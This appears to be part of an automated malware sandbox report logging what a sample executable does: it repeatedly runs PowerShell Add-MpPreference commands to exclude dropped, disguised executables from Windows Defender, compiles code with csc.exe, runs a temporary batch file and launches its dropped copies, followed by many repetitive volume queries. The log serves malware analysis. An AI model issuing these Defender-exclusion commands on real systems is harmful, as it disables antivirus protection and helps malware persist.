                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeQueries volume information: C:\Users\user\Desktop\W4tW72sfAD.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformationJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformationJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformationJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
